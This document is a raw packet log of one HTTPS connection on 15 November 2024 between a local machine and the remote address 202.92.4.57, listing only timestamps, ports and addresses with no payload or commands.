                                                                                                                                                                                                    Nov 15, 2024 09:00:12.693641901 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.739979982 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.740041018 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.740073919 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.740091085 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.740104914 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.740128994 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.778641939 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.778712988 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.778726101 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.778742075 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.778767109 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.778790951 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.779375076 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.779427052 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.779453039 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.779460907 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.779524088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.779524088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.810420036 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.810465097 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.810493946 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.810506105 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.810523033 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.810569048 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895611048 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895679951 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895807981 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895832062 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895853043 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895859003 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895874977 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895895004 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895922899 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895946026 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895947933 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895970106 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.895998955 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.896027088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.896891117 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.896939039 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.896974087 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.896984100 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.897002935 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.897018909 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.927947998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.927993059 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.928112030 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.928131104 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:12.928173065 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015515089 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015588999 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015631914 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015650988 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015676975 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015690088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015866041 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015909910 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015923977 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015934944 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.015959978 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.016030073 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.016972065 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.017023087 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.017059088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.017070055 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.017092943 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.017111063 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.045315981 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.045377970 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.045443058 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.045454979 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.045595884 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.132186890 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.132249117 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.132299900 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.132314920 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.132342100 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.132359028 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.132936001 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.132977962 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.133017063 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.133025885 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.133044958 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.133071899 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.134143114 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.134190083 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.134238005 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.134246111 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.134279013 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.134294033 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.162220001 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.162280083 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.162301064 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.162313938 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.162333012 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.162353992 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.203496933 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.203561068 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.203593969 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.203607082 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.203627110 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.203649998 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255439043 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255506039 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255593061 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255609989 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255641937 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255660057 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255690098 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255737066 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255757093 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255767107 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255791903 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.255806923 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279026031 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279071093 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279115915 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279126883 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279156923 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279171944 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279704094 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279750109 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279771090 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279778957 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279820919 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.279844999 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369102955 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369173050 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369250059 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369321108 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369358063 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369385004 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369410038 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369465113 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369507074 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369530916 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369554996 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.369576931 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.370507002 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.370549917 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.370729923 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.370738983 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.370784044 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396409988 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396470070 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396524906 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396594048 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396640062 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396667957 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396856070 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396900892 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396934986 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396949053 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.396977901 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.397027969 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486160040 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486231089 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486291885 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486339092 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486373901 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486402035 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486413956 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486445904 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486485004 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486510038 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486536026 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486557961 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486584902 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.486608028 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.487477064 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.487520933 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.487565041 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.487584114 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.487608910 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.487637997 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.513659000 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.513727903 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.513767958 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.513793945 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.513847113 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.513868093 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.514117002 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.514168978 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.514202118 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.514214993 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.514245033 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.514266014 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603583097 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603650093 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603801012 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603812933 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603873014 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603913069 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603913069 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603919029 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603940964 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603957891 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.603986025 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.604013920 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.604477882 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.604527950 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.604573011 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.604598045 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.604624033 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.604657888 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631131887 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631191015 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631263971 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631366014 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631398916 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631414890 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631414890 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631438971 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631463051 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631485939 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631510973 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631519079 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631548882 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.631623983 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720640898 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720679998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720788002 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720788002 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720854998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720891953 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720906019 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720922947 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720952034 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.720979929 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721004963 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721014977 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721071959 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721071959 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721309900 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721352100 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721391916 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721419096 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721442938 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721466064 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721952915 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.721997976 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.722033024 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.722057104 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.722084045 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.722115993 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.748759985 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.748826027 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.748917103 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.748918056 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.748982906 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.749037981 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.789222956 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.789284945 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.789364100 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.789365053 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.789429903 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.789505959 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838009119 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838069916 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838228941 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838267088 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838283062 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838340998 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838386059 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838386059 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838886023 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838927031 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.838979006 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.839011908 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.839037895 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865365982 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865432024 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865525961 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865526915 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865561962 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865595102 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865638971 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865669012 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865684032 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.865709066 CET49704443192.168.2.5202.92.4.57
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.906578064 CET44349704202.92.4.57192.168.2.5
                                                                                                                                                                                                    Nov 15, 2024 09:00:13.906656027 CET44349704202.92.4.57192.168.2.5
